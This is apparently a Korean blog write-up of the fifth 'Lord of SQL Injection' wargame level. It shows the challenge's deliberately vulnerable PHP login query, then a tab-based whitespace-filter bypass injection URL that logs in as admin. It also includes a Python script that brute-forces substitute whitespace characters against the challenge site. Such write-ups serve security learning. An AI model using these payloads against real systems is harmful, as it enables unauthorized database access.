Notice

Recent Posts

Recent Comments

Link

« 2025/06 »
일	월	화	수	목	금	토
1	2	3	4	5	6	7
8	9	10	11	12	13	14
15	16	17	18	19	20	21
22	23	24	25	26	27	28
29	30

Tags more

Archives

Today

Total

관리 메뉴

공부하자

lord of sql injection - no.5 wolfman 본문

Write-up/Lord of SQL Injection

lord of sql injection - no.5 wolfman

공부를 하자 2017. 11. 15. 11:31

Lord of SQL Injection No.5 Wolfman

LOS Wolfman 문제는 공백(WhiteSpace)을 우회하고 id값을 충족하여 문제를 해결할 수 있도록 유도한 문제이다.

소스 코드

<?php 

  include "./config.php"; 

  login_chk(); 

  dbconnect(); 

  if(preg_match('/prob|_|\.|\(\)/i', $_GET[pw])) exit("No Hack ~_~"); 

  if(preg_match('/ /i', $_GET[pw])) exit("No whitespace ~_~"); 

  $query = "select id from prob_wolfman where id='guest' and pw='{$_GET[pw]}'"; 

  echo "<hr>query : <strong>{$query}</strong><hr><br>"; 

  $result = @mysql_fetch_array(mysql_query($query)); 

  if($result['id']) echo "<h2>Hello {$result[id]}</h2>"; 

  if($result['id'] == 'admin') solve("wolfman"); 

  highlight_file(__FILE__); 

?>

if(preg_match('/ /i', $_GET[pw])) exit("No whitespace ~_~");

preg_match 함수에서 정규표현식 매칭을 실행하는 중에 공백(Whitespace)을 만나면 No whitespace ~_~를 출력하고 문제 풀이에 실패하게 된다.

문제 풀이 조건

preg_match에 필터링되지 않고 입력한 id값이 admin과 일치하면 문제 해결에 성공한다.

Solution

http://los.eagle-jump.org/wolfman_***.php?pw=%27%09or%09id=%27admin%27%09%23

위에서 언급했듯이 소스코드에서 preg_match가 공백(Whitespace)을 필터링하고 있기 때문에 Whitespace를 대신하여 사용할 수 있는 공백 문자를 URL에 삽입하면 문제풀이에 성공하게 된다.

`Whitespace` 대신에 사용할 수 있는 문자

import urllib.request

from urllib.parse import quote



result = ""

for i in range(0, 127):

    url = "http://los.eagle-jump.org/wolfman_f14e72f8d97e3cb7b8fe02bef1590757.php?pw='"

    add_url = "{0}or{0}id='admin'{0}#".format(chr(i))

    print("Searcing.. => {}".format(add_url))

    add_url = quote(add_url)

    new_url = url + add_url

    re = urllib.request.Request(new_url)

    re.add_header("User-Agent", "Mozilla/5.0")

    re.add_header("Cookie", "PHPSESSID=4tgjrq03a101lqirm2povahog7")

    res = urllib.request.urlopen(re)



    if str(res.read()).find("WOLFMAN Clear!") != -1:

        result = result + "ASCII({})".format(hex(i)[2:]) + " "

        print("Found it!! => {} (ASCII - {})".format(chr(i),i))

print("Finished..")

print(result)

아스키코드에서 Whitespace 대신 사용할 수 있는 문자는 얼마나 있을까 호기심이 생겨 Python을 통해 코드를 짜보았다.

코드의 결과값으로 나온 대체 문자에는 5가지가 있었다.

Tab (%09) // URL에서 사용된 대체 문자.
Line Feed (%0A)
Vertical Tab (%0B)
Form Feed (%0C)
Carriage Return (%0D)

저작자표시 (새창열림)

'Write-up > Lord of SQL Injection' 카테고리의 다른 글

lord of sql injection - no.7 orge (0)	2017.11.15
lord of sql injection - no.6 darkelf (0)	2017.11.15
lord of sql injection - no.4 orc (0)	2017.11.15
lord of sql injection - no.3 goblin (0)	2017.11.15
lord of sql injection - no.2 cobolt (0)	2017.11.14

공유하기 링크

페이스북
카카오스토리
트위터

'Write-up/Lord of SQL Injection' Related Articles

Comments

내 블로그 - 관리자 홈 전환	`Q` `Q`
새 글 쓰기	`W` `W`

글 수정 (권한 있는 경우)	`E` `E`
댓글 영역으로 이동	`C` `C`

이 페이지의 URL 복사	`S` `S`
맨 위로 이동	`T` `T`
티스토리 홈 이동	`H` `H`
단축키 안내	`Shift` + `/` `⇧` + `/`

공부하자

공부하자

lord of sql injection - no.5 wolfman 본문

lord of sql injection - no.5 wolfman

Lord of SQL Injection No.5 Wolfman

소스 코드

문제 풀이 조건

Solution

`Whitespace` 대신에 사용할 수 있는 문자

'Write-up > Lord of SQL Injection' 카테고리의 다른 글

티스토리툴바

단축키

내 블로그

블로그 게시글

모든 영역

공부하자

lord of sql injection - no.5 wolfman 본문

lord of sql injection - no.5 wolfman

Lord of SQL Injection No.5 Wolfman

소스 코드

문제 풀이 조건

Solution

Whitespace 대신에 사용할 수 있는 문자

'Write-up > Lord of SQL Injection' 카테고리의 다른 글

티스토리툴바

단축키

내 블로그

블로그 게시글

모든 영역

`Whitespace` 대신에 사용할 수 있는 문자